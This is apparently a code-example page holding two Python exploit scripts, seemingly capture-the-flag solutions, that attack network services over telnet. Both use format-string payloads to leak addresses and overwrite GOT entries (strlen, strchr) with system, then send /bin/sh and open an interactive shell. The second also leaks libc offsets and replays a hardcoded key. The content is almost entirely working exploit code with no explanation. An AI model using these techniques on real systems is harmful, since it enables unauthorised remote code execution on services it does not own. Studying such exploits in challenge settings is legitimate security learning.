Exemplo n.º 1
0
def main():

    # GOT Overrite
    system_plt = 0x08048490
    strlen_got = 0x08049a54

    fini_array = 0x08049934
    main = 0x080485ed
    
    ret2main = '%19$08xx'
    
    tn = telnetlib.Telnet(HOST, PORT)

    p = FormatStr()
    p[fini_array] = [main]
    p[strlen_got] = [system_plt]
    
    payload  = p.payload(12, 2, len('Nice to meet you, '))
    payload += b'\n'
    
    tn.read_until(b'name... ')
    tn.write(payload)
    tn.read_until(b'name... ')
    tn.write(b'/bin/sh\n')
    tn.interact()
Exemplo n.º 2
0
def main():

    coordinates =  '51.492137,-0.192878 '
    libc_setsockopt_offset = 0xea8e0
    libc_system_offset = 0x3af40
    libc_binsh_offset = 0x15ef08
    strchr_got_offset = 0x505c
    
    tn  = Telnet(HOST, PORT)
    stage = 0
    while stage < 5:
        try:
            game(tn)
            stage += 1
        except:
            del(tn)
            tn  = Telnet(HOST, PORT)
            stage = 0

    
    tn.read_until(b'TARDIS KEY: ')
    tn.write(b'UeSlhCAGEp\n')
    tn.read_until(b'Selection: ')
    tn.write(b'11111111\x00')

    print('wait for alarm')
    time.sleep(3)

    tn.write(struct.pack('L', 1431907181))
    tn.write(b'11111111\xff')
    tn.write(b'1\n')
    
    
    tn.read_until(b'Selection: ')
    tn.write(b'3\n')
    
    tn.read_until(b'Coordinates: ')
    tn.write(coordinates.encode())
    tn.write('zzz%{}$p\n'.format(int((0xff8ce05c-0xff8cdc0c)/4-1)).encode())
    tn.read_until(b'zzz')
    
    base_addr = int(tn.read_some()[0:10].decode(), 16) - 0x1491
    print('base addr : {}'.format(hex(base_addr)))
    
    tn.read_until(b'Coordinates: ')

    tn.write(coordinates.encode())
    tn.write(b'zzzz')
    tn.write(struct.pack('<I', base_addr+0x500c)) 
    tn.write(b'%21$s\n')
    tn.read_until(b'zzzz')
    setsockopt_addr = struct.unpack('<I', tn.read_some()[4:8])[0]
    print('setsockopt :{}'.format(hex(setsockopt_addr)))

    libc_system = setsockopt_addr - (libc_setsockopt_offset - libc_system_offset)
    libc_binsh = setsockopt_addr - (libc_setsockopt_offset - libc_binsh_offset)

    print('system :{}'.format(hex(libc_system)))

    strchr_got = base_addr + strchr_got_offset

    print('strchr_got :{}'.format(hex(strchr_got)))

    p = FormatStr()
    p[strchr_got] = libc_system - 0x14 - 0x140000

    tn.write(coordinates.encode())
    tn.write(p.payload(20) + b'\n')

    tn.read_until(b'Coordinates: ')
    tn.read_until(b'Coordinates: ')
    tn.write(b'/bin/sh\n')
    tn.interact()